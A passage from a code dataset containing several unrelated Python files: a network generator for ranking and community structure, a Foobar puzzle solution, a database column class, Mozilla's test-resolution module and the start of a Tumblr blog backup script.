pd.DataFrame(data, columns = ['source', 'target', 'w'], index = None)\n df.to_csv(self.folder + outfile, index = False, sep = ' ')\n if self.verbose:\n print(f'Adjacency matrix saved in: {self.folder + outfile}')\n\n\ndef ranking_scores(prng=None, mix=False, permute=False, gamma=0.01, beta=5., N=100, l=1, means=None, stds=None):\n \"\"\"\n Generate the ranking scores.\n\n Parameters\n ----------\n prng : random generator container\n Seed for the random number generator.\n mix : bool\n Flag for generating the ranking scores with a Gaussian mixture.\n permute : bool\n Flag for permuting the node before associating a ranking score to each of them,\n i.e. the hierarchical block structure induced on the adjacency matrix is randomized.\n gamma : float\n The spring constant for (s, origin).\n beta : float\n Inveres temperature parameter.\n N : int\n Number of nodes.\n l : int\n Number of leagues\n means : list\n List of means to be used for the scores generation.\n stds : list\n List of means to be used for the scores generation.\n\n Returns\n ----------\n s : Numpy array\n N-dimensional array of real ranking scores for each node.\n\n nodes_s : Numpy array\n Result of the random permutation applied to the node IDs (if required).\n Can be used for inverting the permutation and induce the block structure\n generated by the leagues on the adjacency matrix.\n \"\"\"\n if prng is None:\n # Set seed random number generator\n prng = np.random.RandomState(seed = 42)\n if mix:\n if means is None:\n means = prng.randint(-5, 5, l)\n if stds is None:\n stds = prng.randint(0, 1, l)\n s = np.concatenate([prng.normal(means[i], stds[i], N // l) for i in range(l - 1)])\n if N % l:\n s = np.concatenate([s, prng.normal(means[-1], stds[-1], N - s.shape[0])])\n if permute:\n # shuffle s in order to not have a ranking structure overlapped to the communities one\n nodes_s = prng.permutation(N)\n s = s[nodes_s]\n else:\n nodes_s = np.arange(N)\n else:\n # Generate s through factorized Gaussian, l0 = 0\n s = prng.normal(0, 1. / np.sqrt(gamma * beta), N)\n nodes_s = np.arange(N)\n\n return s, nodes_s\n\n\ndef membership_vectors(prng=None, L1=False, eta=0.5, alpha=0.6, beta=1, K=3, N=100, corr=0., over=0.):\n \"\"\"\n Compute the NxK membership vectors u, v using a Dirichlet or a Gamma distribution.\n Parameters\n ----------\n prng: Numpy Random object\n Random number generator container.\n L1 : bool\n Flag for parameter generation method. True for Dirichlet, False for Gamma.\n eta : float\n Parameter for Dirichlet.\n alpha : float\n Parameter (alpha) for Gamma.\n beta : float\n Parameter (beta) for Gamma.\n N : int\n Number of nodes.\n K : int\n Number of communities.\n corr : float\n Correlation between u and v synthetically generated.\n over : float\n Fraction of nodes with mixed membership.\n Returns\n -------\n u : Numpy array\n Matrix NxK of out-going membership vectors, positive element-wise.\n Possibly None if in pure SpringRank or pure MultiTensor.\n With unitary L1 norm computed row-wise.\n\n v : Numpy array\n Matrix NxK of in-coming membership vectors, positive element-wise.\n Possibly None if in pure SpringRank or pure MultiTensor.\n With unitary L1 norm computed row-wise.\n \"\"\"\n if prng is None:\n # Set seed random number generator\n prng = np.random.RandomState(seed = 42)\n # Generate equal-size unmixed group membership\n size = int(N / K)\n u = np.zeros((N, K))\n v = np.zeros((N, K))\n for i in range(N):\n q = int(math.floor(float(i) / float(size)))\n if q == K:\n u[i:, K - 1] = 1.\n v[i:, K - 1] = 1.\n else:\n for j in range(q * size, q * size + size):\n u[j, q] = 1.\n v[j, q] = 1.\n # Generate mixed communities if requested\n if over != 0.:\n overlapping = int(N * over) # number of nodes belonging to more than 1 communities\n ind_over = np.random.randint(len(u), size = overlapping)\n if L1:\n u[ind_over] = prng.dirichlet(eta * np.ones(K), overlapping)\n v[ind_over] = corr * u[ind_over] + (1. - corr) * prng.dirichlet(eta * np.ones(K), overlapping)\n if corr == 1.:\n assert np.allclose(u, v)\n if corr > 0:\n v = normalize_nonzero_membership(v)\n else:\n u[ind_over] = prng.gamma(alpha, 1. / beta, size = (N, K))\n v[ind_over] = corr * u[ind_over] + (1. - corr) * prng.gamma(alpha, 1. / beta, size = (overlapping, K))\n u = normalize_nonzero_membership(u)\n v = normalize_nonzero_membership(v)\n return u, v\n\n\ndef affinity_matrix(structure='assortative', N=100, K=3, a=0.1, b=0.5):\n \"\"\"\n Compute the KxK affinity matrix w with probabilities between and within groups.\n Parameters\n ----------\n structure : string\n Structure of the network.\n N : int\n Number of nodes.\n K : int\n Number of communities.\n a : float\n Parameter for secondary probabilities.\n b : float\n Parameter for secondary probabilities.\n Returns\n -------\n p : Numpy array\n Array with probabilities between and within groups. Element (k,h)\n gives the density of edges going from the nodes of group k to nodes of group h.\n \"\"\"\n\n b *= a\n p1 = K / N\n while p1 < a:\n a *= 0.1\n\n if structure == 'assortative':\n p = p1 * a * np.ones((K, K)) # secondary-probabilities\n np.fill_diagonal(p, p1 * np.ones(K)) # primary-probabilities\n\n elif structure == 'disassortative':\n p = p1 / K * np.ones((K, K)) # primary-probabilities\n np.fill_diagonal(p, a * p1 * np.ones(K)) # secondary-probabilities\n\n elif structure == 'core-periphery':\n p = p1 / K * np.ones((K, K))\n np.fill_diagonal(np.fliplr(p), a * p1)\n p[1, 1] = b * p1\n\n elif structure == 'directed-biased':\n p = a * p1 * np.ones((K, K))\n p[0, 1] = p1\n p[1, 0] = b * p1\n\n return p\n\n\ndef normalize_nonzero_membership(u):\n \"\"\"\n Given a matrix, it returns the same matrix normalized by row.\n Parameters\n ----------\n u: Numpy array\n Numpy Matrix.\n Returns\n -------\n The matrix normalized by row.\n \"\"\"\n\n den1 = u.sum(axis = 1, keepdims = True)\n nzz = den1 == 0.\n den1[nzz] = 1.\n\n return u / den1\n\n\n@jit(nopython = True)\ndef delta_scores(s):\n \"\"\"\n Compute the pairwise ranking differences.\n \"\"\"\n N = s.shape[0]\n delta_s = np.zeros((N, N))\n for i in range(N):\n for j in range(N):\n delta_s[i, j] = s[i] - s[j]\n return delta_s\n","repo_name":"liacov/XOR-rankcom","sub_path":"src/modules/XOR_generator.py","file_name":"XOR_generator.py","file_ext":"py","file_size_in_byte":21559,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"26311159822","text":"# Solution overview:\n# 1. Take substrings of query as a kernel\n# 2. Compare kernel for matches\n# 3. Earliest match results in more sharing (=> caring).\ndef factors(n):\n return [k for k in list(range(1, n+1)) if (n % k == 0)]\n\ndef match(kernel, vec):\n window_posn = [len(kernel)*i for i in range(int(len(vec)/len(kernel)))]\n for ix in window_posn:\n for k, asc in zip(kernel, vec[ix:ix+len(kernel)]):\n if (k - asc) != 0:\n return False\n return True\n\ndef answer(s):\n asc = [ord(c) for c in s]\n for f in factors(len(s)):\n kernel = asc[:f]\n if match(kernel, asc):\n return int(f/len(s))\n","repo_name":"tbaybay/Foobar-challenges","sub_path":"the_cake_is_a_lie.py","file_name":"the_cake_is_a_lie.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74742313706","text":"from magic_repr import make_repr\n\n__all__ = ['Column']\n\n\nclass Column:\n def __init__(\n self,\n name=None,\n type_=None,\n not_null=True,\n auto_inc=False,\n unique=False,\n pk=False,\n fk=None,\n display=False\n ):\n self.name = name\n self.type_ = type_\n self._not_null = not_null\n self.auto_inc = auto_inc\n self._unique = unique\n self.pk = pk\n self.fk = fk\n self.display = display\n\n @property\n def not_null(self):\n return self._not_null if not self.pk else True\n\n @property\n def unique(self):\n if self.pk and self.fk is None:\n return True\n return self._unique\n\n def resolve_type(self):\n self.type_ = self.fk.column.type_\n\n\nColumn.__repr__ = make_repr(\n 'name', 'type_', 'not_null', 'auto_inc', 'unique', 'pk', 'fk'\n)\n","repo_name":"SqrtMinusOne/ERMaket","sub_path":"ermaket/api/erd/rd_entities/column.py","file_name":"column.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13692485487","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\nfrom __future__ import absolute_import, unicode_literals\n\nimport json\nimport os\n\nimport mozpack.path as mozpath\n\nfrom .base import MozbuildObject\nfrom .util import OrderedDefaultDict\nfrom collections import defaultdict\n\n\ndef rewrite_test_base(test, new_base, honor_install_to_subdir=False):\n \"\"\"Rewrite paths in a test to be under a new base path.\n\n This is useful for running tests from a separate location from where they\n were defined.\n\n honor_install_to_subdir and the underlying install-to-subdir field are a\n giant hack intended to work around the restriction where the mochitest\n runner can't handle single test files with multiple configurations. This\n argument should be removed once the mochitest runner talks manifests\n (bug 984670).\n \"\"\"\n test['here'] = mozpath.join(new_base, test['dir_relpath'])\n\n if honor_install_to_subdir and test.get('install-to-subdir'):\n manifest_relpath = mozpath.relpath(test['path'],\n mozpath.dirname(test['manifest']))\n test['path'] = mozpath.join(new_base, test['dir_relpath'],\n test['install-to-subdir'], manifest_relpath)\n else:\n test['path'] = mozpath.join(new_base, test['file_relpath'])\n\n return test\n\n\nclass TestMetadata(object):\n \"\"\"Holds information about tests.\n\n This class provides an API to query tests active in the build\n configuration.\n \"\"\"\n\n def __init__(self, filename=None):\n self._tests_by_path = OrderedDefaultDict(list)\n self._tests_by_flavor = defaultdict(set)\n self._test_dirs = set()\n\n if filename:\n with open(filename, 'rt') as fh:\n d = json.load(fh)\n\n for path, tests in d.items():\n for metadata in tests:\n self._tests_by_path[path].append(metadata)\n self._test_dirs.add(os.path.dirname(path))\n\n flavor = metadata.get('flavor')\n self._tests_by_flavor[flavor].add(path)\n\n def tests_with_flavor(self, flavor):\n \"\"\"Obtain all tests having the specified flavor.\n\n This is a generator of dicts describing each test.\n \"\"\"\n\n for path in sorted(self._tests_by_flavor.get(flavor, [])):\n yield self._tests_by_path[path]\n\n def resolve_tests(self, paths=None, flavor=None, subsuite=None, under_path=None,\n tags=None):\n \"\"\"Resolve tests from an identifier.\n\n This is a generator of dicts describing each test.\n\n ``paths`` can be an iterable of values to use to identify tests to run.\n If an entry is a known test file, tests associated with that file are\n returned (there may be multiple configurations for a single file). If\n an entry is a directory, or a prefix of a directory containing tests,\n all tests in that directory are returned. If the string appears in a\n known test file, that test file is considered. If the path contains\n a wildcard pattern, tests matching that pattern are returned.\n\n If ``under_path`` is a string, it will be used to filter out tests that\n aren't in the specified path prefix relative to topsrcdir or the\n test's installed dir.\n\n If ``flavor`` is a string, it will be used to filter returned tests\n to only be the flavor specified. A flavor is something like\n ``xpcshell``.\n\n If ``subsuite`` is a string, it will be used to filter returned tests\n to only be in the subsuite specified.\n\n If ``tags`` are specified, they will be used to filter returned tests\n to only those with a matching tag.\n \"\"\"\n if tags:\n tags = set(tags)\n\n def fltr(tests):\n for test in tests:\n if flavor:\n if (flavor == 'devtools' and test.get('flavor') != 'browser-chrome') or \\\n (flavor != 'devtools' and test.get('flavor') != flavor):\n continue\n\n if subsuite and test.get('subsuite') != subsuite:\n continue\n\n if tags and not (tags & set(test.get('tags', '').split())):\n continue\n\n if under_path \\\n and not test['file_relpath'].startswith(under_path):\n continue\n\n # Make a copy so modifications don't change the source.\n yield dict(test)\n\n paths = paths or []\n paths = [mozpath.normpath(p) for p in paths]\n if not paths:\n paths = [None]\n\n candidate_paths = set()\n\n for path in sorted(paths):\n if path is None:\n candidate_paths |= set(self._tests_by_path.keys())\n continue\n\n if '*' in path:\n candidate_paths |= {p for p in self._tests_by_path\n if mozpath.match(p, path)}\n continue\n\n # If the path is a directory, or the path is a prefix of a directory\n # containing tests, pull in all tests in that directory.\n if (path in self._test_dirs or\n any(p.startswith(path) for p in self._tests_by_path)):\n candidate_paths |= {p for p in self._tests_by_path\n if p.startswith(path)}\n continue\n\n # If it's a test file, add just that file.\n candidate_paths |= {p for p in self._tests_by_path if path in p}\n\n for p in sorted(candidate_paths):\n tests = self._tests_by_path[p]\n\n for test in fltr(tests):\n yield test\n\n\nclass TestResolver(MozbuildObject):\n \"\"\"Helper to resolve tests from the current environment to test files.\"\"\"\n\n def __init__(self, *args, **kwargs):\n MozbuildObject.__init__(self, *args, **kwargs)\n\n self._tests = TestMetadata(filename=os.path.join(self.topobjdir,\n 'all-tests.json'))\n self._test_rewrites = {\n 'a11y': os.path.join(self.topobjdir, '_tests', 'testing',\n 'mochitest', 'a11y'),\n 'browser-chrome': os.path.join(self.topobjdir, '_tests', 'testing',\n 'mochitest', 'browser'),\n 'jetpack-package': os.path.join(self.topobjdir, '_tests', 'testing',\n 'mochitest', 'jetpack-package'),\n 'jetpack-addon': os.path.join(self.topobjdir, '_tests', 'testing',\n 'mochitest', 'jetpack-addon'),\n 'chrome': os.path.join(self.topobjdir, '_tests', 'testing',\n 'mochitest', 'chrome'),\n 'mochitest': os.path.join(self.topobjdir, '_tests', 'testing',\n 'mochitest', 'tests'),\n 'webapprt-chrome': os.path.join(self.topobjdir, '_tests', 'testing',\n 'mochitest', 'webapprtChrome'),\n 'webapprt-content': os.path.join(self.topobjdir, '_tests', 'testing',\n 'mochitest', 'webapprtContent'),\n 'web-platform-tests': os.path.join(self.topobjdir, '_tests', 'testing',\n 'web-platform'),\n 'xpcshell': os.path.join(self.topobjdir, '_tests', 'xpcshell'),\n }\n\n def resolve_tests(self, cwd=None, **kwargs):\n \"\"\"Resolve tests in the context of the current environment.\n\n This is a more intelligent version of TestMetadata.resolve_tests().\n\n This function provides additional massaging and filtering of low-level\n results.\n\n Paths in returned tests are automatically translated to the paths in\n the _tests directory under the object directory.\n\n If cwd is defined, we will limit our results to tests under the\n directory specified. The directory should be defined as an absolute\n path under topsrcdir or topobjdir for it to work properly.\n \"\"\"\n rewrite_base = None\n\n if cwd:\n norm_cwd = mozpath.normpath(cwd)\n norm_srcdir = mozpath.normpath(self.topsrcdir)\n norm_objdir = mozpath.normpath(self.topobjdir)\n\n reldir = None\n\n if norm_cwd.startswith(norm_objdir):\n reldir = norm_cwd[len(norm_objdir)+1:]\n elif norm_cwd.startswith(norm_srcdir):\n reldir = norm_cwd[len(norm_srcdir)+1:]\n\n result = self._tests.resolve_tests(under_path=reldir,\n **kwargs)\n\n else:\n result = self._tests.resolve_tests(**kwargs)\n\n for test in result:\n rewrite_base = self._test_rewrites.get(test['flavor'], None)\n\n if rewrite_base:\n yield rewrite_test_base(test, rewrite_base,\n honor_install_to_subdir=True)\n else:\n yield test\n\n# These definitions provide a single source of truth for modules attempting\n# to get a view of all tests for a build. Used by the emitter to figure out\n# how to read/install manifests and by test dependency annotations in Files()\n# entries to enumerate test flavors.\n\n# While there are multiple test manifests, the behavior is very similar\n# across them. We enforce this by having common handling of all\n# manifests and outputting a single class type with the differences\n# described inside the instance.\n#\n# Keys are variable prefixes and values are tuples describing how these\n# manifests should be handled:\n#\n# (flavor, install_prefix, package_tests)\n#\n# flavor identifies the flavor of this test.\n# install_prefix is the path prefix of where to install the files in\n# the tests directory.\n# package_tests indicates whether to package test files into the test\n# package; suites that compile the test files should not install\n# them into the test package.\n#\nTEST_MANIFESTS = dict(\n A11Y=('a11y', 'testing/mochitest', 'a11y', True),\n BROWSER_CHROME=('browser-chrome', 'testing/mochitest', 'browser', True),\n ANDROID_INSTRUMENTATION=('instrumentation', 'instrumentation', '.', False),\n JETPACK_PACKAGE=('jetpack-package', 'testing/mochitest', 'jetpack-package', True),\n JETPACK_ADDON=('jetpack-addon', 'testing/mochitest', 'jetpack-addon', False),\n METRO_CHROME=('metro-chrome', 'testing/mochitest', 'metro', True),\n MOCHITEST=('mochitest', 'testing/mochitest', 'tests', True),\n MOCHITEST_CHROME=('chrome', 'testing/mochitest', 'chrome', True),\n MOCHITEST_WEBAPPRT_CONTENT=('webapprt-content', 'testing/mochitest', 'webapprtContent', True),\n MOCHITEST_WEBAPPRT_CHROME=('webapprt-chrome', 'testing/mochitest', 'webapprtChrome', True),\n WEBRTC_SIGNALLING_TEST=('steeplechase', 'steeplechase', '.', True),\n XPCSHELL_TESTS=('xpcshell', 'xpcshell', '.', True),\n)\n\n# Reftests have their own manifest format and are processed separately.\nREFTEST_FLAVORS = ('crashtest', 'reftest')\n\n# Web platform tests have their own manifest format and are processed separately.\nWEB_PATFORM_TESTS_FLAVORS = ('web-platform-tests',)\n\ndef all_test_flavors():\n return ([v[0] for v in TEST_MANIFESTS.values()] +\n list(REFTEST_FLAVORS) +\n list(WEB_PATFORM_TESTS_FLAVORS))\n","repo_name":"classilla/tenfourfox","sub_path":"python/mozbuild/mozbuild/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":11278,"program_lang":"python","lang":"en","doc_type":"code","stars":251,"dataset":"github-code","pt":"37"} +{"seq_id":"1350803211","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import, division, print_function, with_statement\n\n# standard Python library imports\nimport errno\nimport hashlib\nimport imghdr\nimport io\nimport itertools\nimport locale\nimport multiprocessing\nimport os\nimport re\nimport shutil\nimport sys\nimport threading\nimport time\nfrom collections import defaultdict\nfrom datetime import datetime, timedelta\nfrom glob import glob\nfrom multiprocessing.queues import SimpleQueue\nfrom os.path import join, split, splitext\nfrom posixpath import basename as urlbasename, join as urlpathjoin, splitext as urlsplitext\nfrom xml.sax.saxutils import escape\n\nfrom util import (ConnectionFile, LockedQueue, LogLevel, PY3, is_dns_working, make_requests_session, no_internet,\n nullcontext, to_bytes, to_unicode)\nfrom wget import HTTPError, HTTP_RETRY, HTTP_TIMEOUT, WGError, WgetRetrieveWrapper, setup_wget, touch, urlopen\n\ntry:\n from typing import TYPE_CHECKING\nexcept ImportError:\n TYPE_CHECKING = False\n\nif TYPE_CHECKING:\n from queue import Queue\n from typing import Any, Callable, DefaultDict, Dict, Iterable, List, Optional, Set, Text, Tuple, Type\n\n JSONDict = Dict[str, Any]\n\ntry:\n import json\nexcept ImportError:\n import simplejson as json # type: ignore[no-redef]\n\ntry:\n import queue\nexcept ImportError:\n import Queue as queue # type: ignore[no-redef]\n\ntry:\n from urllib.parse import quote, urlencode, urlparse\nexcept ImportError:\n from urllib import quote, urlencode # type: ignore[attr-defined,no-redef]\n from urlparse import urlparse # type: ignore[no-redef]\n\ntry:\n from settings import DEFAULT_BLOGS\nexcept ImportError:\n DEFAULT_BLOGS = []\n\n# extra optional packages\ntry:\n import pyexiv2\nexcept ImportError:\n pyexiv2 = None\n\ntry:\n import yt_dlp as youtube_dl\nexcept ImportError:\n try:\n import youtube_dl\n except ImportError:\n youtube_dl = None\n\ntry:\n from bs4 import BeautifulSoup\nexcept ImportError:\n BeautifulSoup = None\n\ntry:\n import jq\nexcept ImportError:\n jq = None\n\ntry:\n from os import DirEntry, scandir # type: ignore[attr-defined]\nexcept ImportError:\n try:\n from scandir import DirEntry, scandir # type: ignore[no-redef]\n except ImportError:\n scandir = None # type: ignore[assignment,no-redef]\n\n# NB: setup_urllib3_ssl has already been called by wget\n\ntry:\n import requests\nexcept ImportError:\n if not TYPE_CHECKING:\n # Import pip._internal.download first to avoid a potential recursive import\n try:\n from pip._internal import download as _ # noqa: F401\n except ImportError:\n pass # Not absolutely necessary\n try:\n from pip._vendor import requests # type: ignore[no-redef]\n except ImportError:\n raise RuntimeError('The requests module is required. Please install it with pip or your package manager.')\n\n# These builtins have new names in Python 3\ntry:\n long, xrange # type: ignore[has-type]\nexcept NameError:\n long = int\n xrange = range\n\n# Format of displayed tags\nTAG_FMT = u'#{}'\n\n# Format of tag link URLs; set to None to suppress the links.\n# Named placeholders that will be replaced: domain, tag\nTAGLINK_FMT = u'https://{domain}/tagged/{tag}'\n\n# exit codes\nEXIT_SUCCESS = 0\nEXIT_NOPOSTS = 1\n# EXIT_ARGPARSE = 2 -- returned by argparse\nEXIT_INTERRUPT = 3\nEXIT_ERRORS = 4\n\n# add another JPEG recognizer\n# see http://www.garykessler.net/library/file_sigs.html\ndef test_jpg(h, f):\n if h[:3] == b'\\xFF\\xD8\\xFF' and h[3] in b'\\xDB\\xE0\\xE1\\xE2\\xE3':\n return 'jpg'\n\nimghdr.tests.append(test_jpg)\n\n# variable directory names, will be set in TumblrBackup.backup()\nsave_folder = ''\nmedia_folder = ''\n\n# constant names\nroot_folder = os.getcwd()\npost_dir = 'posts'\njson_dir = 'json'\nmedia_dir = 'media'\narchive_dir = 'archive'\ntheme_dir = 'theme'\nsave_dir = '..'\nbackup_css = 'backup.css'\ncustom_css = 'custom.css'\navatar_base = 'avatar'\ndir_index = 'index.html'\ntag_index_dir = 'tags'\n\nblog_name = ''\npost_ext = '.html'\nhave_custom_css = False\n\nPOST_TYPES = ('text', 'quote', 'link', 'answer', 'video', 'audio', 'photo', 'chat')\nTYPE_ANY = 'any'\nTAG_ANY = '__all__'\n\nMAX_POSTS = 50\nREM_POST_INC = 10\n\n# get your own API key at https://www.tumblr.com/oauth/apps\nAPI_KEY = ''\n\n# ensure the right date/time format\ntry:\n locale.setlocale(locale.LC_TIME, '')\nexcept locale.Error:\n pass\nFILE_ENCODING = 'utf-8'\nTIME_ENCODING = locale.getlocale(locale.LC_TIME)[1] or FILE_ENCODING\n\nwget_retrieve = None # type: Optional[WgetRetrieveWrapper]\ndisable_note_scraper = set() # type: Set[str]\ndisablens_lock = threading.Lock()\n\n\nclass Logger(object):\n def __init__(self):\n self.lock = threading.Lock()\n self.backup_account = None # type: Optional[str]\n self.status_msg = None # type: Optional[str]\n\n def log(self, level, msg, account=False):\n if options.quiet and level < LogLevel.WARN:\n return\n with self.lock:\n for line in msg.splitlines(True):\n self._print(line, account)\n if self.status_msg:\n self._print(self.status_msg, account=True)\n sys.stdout.flush()\n\n def info(self, msg, account=False):\n self.log(LogLevel.INFO, msg, account)\n\n def warn(self, msg, account=False):\n self.log(LogLevel.WARN, msg, account)\n\n def error(self, msg, account=False):\n self.log(LogLevel.ERROR, msg, account)\n\n def status(self, msg):\n self.status_msg = msg\n self.log(LogLevel.INFO, '')\n\n def _print(self, msg, account=False):\n if account: # Optional account prefix\n msg = '{}: {}'.format(self.backup_account, msg)\n\n # Separate terminator\n it = (i for i, c in enumerate(reversed(msg)) if c not in '\\r\\n')\n try:\n idx = len(msg) - next(it)\n except StopIteration:\n idx = 0\n msg, term = msg[:idx], msg[idx:]\n\n pad = ' ' * (80 - len(msg)) # Pad to 80 chars\n print(msg + pad + term, end='')\n\n\nlogger = Logger()\n\n\ndef mkdir(dir, recursive=False):\n if not os.path.exists(dir):\n try:\n if recursive:\n os.makedirs(dir)\n else:\n os.mkdir(dir)\n except EnvironmentError as e:\n if e.errno != errno.EEXIST:\n raise\n\n\ndef path_to(*parts):\n return join(save_folder, *parts)\n\n\ndef open_file(open_fn, parts):\n if len(parts) > 1:\n mkdir(path_to(*parts[:-1]), (len(parts) > 2))\n return open_fn(path_to(*parts))\n\n\ndef open_text(*parts):\n return open_file(\n lambda f: io.open(f, 'w', encoding=FILE_ENCODING, errors='xmlcharrefreplace'), parts\n )\n\n\ndef strftime(fmt, t=None):\n if t is None:\n t = time.localtime()\n s = time.strftime(fmt, t)\n return to_unicode(s, encoding=TIME_ENCODING)\n\n\ndef get_api_url(account):\n \"\"\"construct the tumblr API URL\"\"\"\n global blog_name\n blog_name = account\n if any(c in account for c in '/\\\\') or account in ('.', '..'):\n raise ValueError('Invalid blog name: {!r}'.format(account))\n if '.' not in account:\n blog_name += '.tumblr.com'\n return 'https://api.tumblr.com/v2/blog/%s/%s' % (\n blog_name, 'likes' if options.likes else 'posts'\n )\n\n\ndef set_period():\n \"\"\"Prepare the period start and end timestamps\"\"\"\n i = 0\n tm = [int(options.period[:4]), 1, 1, 0, 0, 0, 0, 0, -1]\n if len(options.period) >= 6:\n i = 1\n tm[1] = int(options.period[4:6])\n if len(options.period) == 8:\n i = 2\n tm[2] = int(options.period[6:8])\n\n def mktime(tml):\n tmt = tuple(tml) # type: Any\n return time.mktime(tmt)\n\n options.p_start = int(mktime(tm))\n tm[i] += 1\n options.p_stop = int(mktime(tm))\n\n\nclass ApiParser(object):\n session = None # type: Optional[requests.Session]\n\n def __init__(self, base, account):\n self.base = base\n self.account = account\n self.prev_resps = None # type: Optional[Tuple[str, ...]]\n self.dashboard_only_blog = None # type: Optional[bool]\n\n @classmethod\n def setup(cls):\n cls.session = make_requests_session(\n requests.Session, HTTP_RETRY, HTTP_TIMEOUT,\n not options.no_ssl_verify, options.user_agent, options.cookiefile,\n )\n\n def read_archive(self, prev_archive):\n assert scandir is not None\n\n def read_resp(path):\n with io.open(path, encoding=FILE_ENCODING) as jf:\n return json.load(jf)\n\n if options.likes:\n logger.warn('Reading liked timestamps from saved responses (may take a while)\\n', account=True)\n\n self.prev_resps = tuple(\n e.path for e in sorted(\n (e for e in scandir(join(prev_archive, 'json')) if (e.name.endswith('.json') and e.is_file())),\n key=lambda e: read_resp(e)['liked_timestamp'] if options.likes else long(e.name[:-5]),\n reverse=True,\n )\n )\n\n def apiparse(self, count, start=0, before=None):\n # type: (...) -> Optional[JSONDict]\n assert self.session is not None\n if self.prev_resps is not None:\n # Reconstruct the API response\n def read_post(prf):\n with io.open(prf, encoding=FILE_ENCODING) as f:\n try:\n post = json.load(f)\n except ValueError as e:\n f.seek(0)\n logger.error('{}: {}\\n{!r}\\n'.format(e.__class__.__name__, e, f.read()))\n return None\n return prf, post\n posts = map(read_post, self.prev_resps) # type: Iterable[Tuple[DirEntry[str], JSONDict]]\n if before is not None:\n posts = itertools.dropwhile(\n lambda pp: pp[1]['liked_timestamp' if options.likes else 'timestamp'] >= before,\n posts,\n )\n posts = list(itertools.islice(posts, start, start + count))\n return {'posts': [post for prf, post in posts],\n 'post_respfiles': [prf for prf, post in posts],\n 'blog': dict(posts[0][1]['blog'] if posts else {}, posts=len(self.prev_resps))}\n\n if self.dashboard_only_blog:\n base = 'https://www.tumblr.com/svc/indash_blog'\n params = {'tumblelog_name_or_id': self.account, 'post_id': '', 'limit': count,\n 'should_bypass_safemode': 'true', 'should_bypass_tagfiltering': 'true'}\n headers = {\n 'Referer': 'https://www.tumblr.com/dashboard/blog/' + self.account,\n 'X-Requested-With': 'XMLHttpRequest',\n } # type: Optional[Dict[str, str]]\n else:\n base = self.base\n params = {'api_key': API_KEY, 'limit': count, 'reblog_info': 'true'}\n headers = None\n if before is not None:\n params['before'] = before\n elif start > 0:\n params['offset'] = start\n\n sleep_dur = 30 # in seconds\n while True:\n doc = self._get_resp(base, params, headers)\n if doc is None:\n return None\n status = doc['meta']['status']\n if status != 429:\n break\n time.sleep(sleep_dur)\n sleep_dur *= 2\n if status != 200:\n # Detect dashboard-only blogs by the error codes\n if self.dashboard_only_blog is None and status == 404:\n errors = doc.get('errors', ())\n if len(errors) == 1 and errors[0].get('code') == 4012:\n self.dashboard_only_blog = True\n logger.info('Found dashboard-only blog, trying svc API\\n', account=True)\n return self.apiparse(count, start) # Recurse once\n logger.error('API response has non-200 status:\\n{}\\n'.format(doc))\n if status == 401 and self.dashboard_only_blog:\n logger.error(\"This is a dashboard-only blog, so you probably don't have the right cookies.{}\\n\".format(\n '' if options.cookiefile else ' Try --cookiefile.',\n ))\n return None\n if self.dashboard_only_blog:\n with disablens_lock:\n if self.account not in disable_note_scraper:\n disable_note_scraper.add(self.account)\n logger.warn('[Note Scraper] Dashboard-only blog - scraping disabled for {}\\n'.format(self.account))\n elif self.dashboard_only_blog is None:\n # If the first API request succeeds, it's a public blog\n self.dashboard_only_blog = False\n\n resp = doc.get('response')\n if resp is not None and self.dashboard_only_blog:\n # svc API doesn't return blog info, steal it from the first post\n resp['blog'] = resp['posts'][0]['blog'] if resp['posts'] else {}\n return resp\n\n def _get_resp(self, base, params, headers):\n assert self.session is not None\n while True:\n try:\n with self.session.get(base, params=params, headers=headers) as resp:\n if not (200 <= resp.status_code < 300 or 400 <= resp.status_code < 500):\n logger.error('URL is {}?{}\\nError retrieving API repsonse: HTTP {} {}\\n'.format(\n base, urlencode(params), resp.status_code, resp.reason,\n ))\n return None\n ctype = resp.headers.get('Content-Type')\n if ctype and ctype.split(';', 1)[0].strip() != 'application/json':\n logger.error(\"Unexpected Content-Type: '{}'\\n\".format(ctype))\n return None\n try:\n return resp.json()\n except ValueError as e:\n logger.error('{}: {}\\n{} {} {}\\n{!r}\\n'.format(\n e.__class__.__name__, e, resp.status_code, resp.reason, ctype, resp.content.decode('utf-8'),\n ))\n return None\n except (EnvironmentError, HTTPError) as e:\n if isinstance(e, HTTPError) and not is_dns_working(timeout=5):\n no_internet.signal()\n continue\n logger.error('URL is {}?{}\\nError retrieving API repsonse: {}\\n'.format(base, urlencode(params), e))\n return None\n\n\ndef add_exif(image_name, tags):\n assert pyexiv2 is not None\n try:\n metadata = pyexiv2.ImageMetadata(image_name)\n metadata.read()\n except EnvironmentError:\n logger.error('Error reading metadata for image {}\\n'.format(image_name))\n return\n KW_KEY = 'Iptc.Application2.Keywords'\n if '-' in options.exif: # remove all tags\n if KW_KEY in metadata.iptc_keys:\n del metadata[KW_KEY]\n else: # add tags\n if KW_KEY in metadata.iptc_keys:\n tags |= set(metadata[KW_KEY].value)\n tags = [tag.strip().lower() for tag in tags | options.exif if tag]\n metadata[KW_KEY] = pyexiv2.IptcTag(KW_KEY, tags)\n try:\n metadata.write()\n except EnvironmentError:\n logger.error('Writing metadata failed for tags: {} in: {}\\n'.format(tags, image_name))\n\n\ndef save_style():\n with open_text(backup_css) as css:\n css.write(u'''\\\n@import url(\"override.css\");\n\nbody { width: 720px; margin: 0 auto; }\nbody > footer { padding: 1em 0; }\nheader > img { float: right; }\nimg { max-width: 720px; }\nblockquote { margin-left: 0; border-left: 8px #999 solid; padding: 0 24px; }\n.archive h1, .subtitle, article { padding-bottom: 0.75em; border-bottom: 1px #ccc dotted; }\narticle[class^=\"liked-\"] { background-color: #f0f0f8; }\n.post a.llink { display: none; }\nheader a, footer a { text-decoration: none; }\nfooter, article footer a { font-size: small; color: #999; }\n''')\n\n\ndef get_avatar(prev_archive):\n if prev_archive is not None:\n # Copy 